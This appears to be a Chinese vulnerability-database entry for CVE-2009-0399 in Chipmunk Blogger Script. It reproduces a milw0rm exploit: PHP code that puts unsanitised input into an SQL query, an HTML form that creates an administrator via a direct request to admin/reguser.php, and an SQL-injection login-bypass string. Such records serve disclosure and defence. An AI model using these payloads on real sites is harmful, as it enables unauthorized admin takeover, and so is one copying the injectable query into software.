Chipmunk Blogger Scrip reguser.php权限提升漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117311 漏洞类型 配置错误
发布时间 2009-01-28 更新时间 2009-02-03
CVE编号 CVE-2009-0399 CNNVD-ID CNNVD-200902-046
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/7894
https://www.securityfocus.com/bid/79618
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-046
|漏洞详情
ChipmunkBloggerScript允许远程攻击者借助一个对admin/reguser.php的直接请求,获得管理员特权。
|漏洞EXP
#########################################################################################
[0x01] Informations:

Script         : Chipmunk Blog
Download       : http://www.chipmunk-scripts.com/blog/blog.zip
Vulnerability  : Add Admin Exploit\Auth Bypass
Author         : x0r
Contact        : x0r@live.it \ andry2000@hotmail.it
Website        : NULL

#########################################################################################
[0x02] Bug: \admin\reguser.php \admin\authenticate.php

if (isset($_POST['submit'])) // name of submit button
{
   $username=$_POST['username'];
   $password=$_POST['password'];
   $password=md5($password);
   $getadmin="SELECT * from bl_admin where username='$username' and
password='$password'";
   $getadmin2=mysql_query($getadmin) or die("Could not get admin");


#########################################################################################
[0x03] Exploit:

Add Admin:

<html>
<head>
<title> Chipmunk Blog (reguser.php) Add Admin Exploit (html)</title>
</head>
<body>
<form action=http://xxxxxxx/blog/admin/reguser.php method=post>
Username:<br>
<input type=text name='username' value='x0r' size="20"><br>
Password:<br>
<input type=text name='password' value='h4x0rz' size="20"><br>
<input type="text" name="pass2" value='h4x0rz' size="15"><br>
<input type=submit name='submit' value='submit'><br>
</form>
</body>
</html>

Exploit2: admin ' or ' 1=1--
#########################################################################################

# milw0rm.com [2009-01-28]
|受影响的产品
Chipmunk Scripts Chipmunk Blogger 0
|参考资料

来源:MILW0RM
名称:7894
链接:http://www.milw0rm.com/exploits/7894